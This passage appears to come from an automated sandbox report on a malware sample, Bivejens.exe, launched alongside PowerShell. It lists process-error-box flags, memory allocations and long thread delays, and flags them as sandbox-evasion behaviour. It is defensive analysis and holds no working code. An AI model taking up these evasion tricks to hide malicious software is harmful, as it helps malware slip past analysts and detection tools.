Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe

API/Special instruction interceptor: Address: 1E95153

Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Memory allocated: 1E6C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Memory allocated: 1E570000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 594851	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 594749	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 594626	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 594431	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 594141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 594016	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 593891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 593782	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Thread delayed: delay time: 593657	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7186	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2514	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Window / User API: threadDelayed 2063	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Window / User API: threadDelayed 7741	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe

API coverage: 1.9 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 6736	Thread sleep count: 2063 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 6736	Thread sleep count: 7741 > 30	Jump to behavior
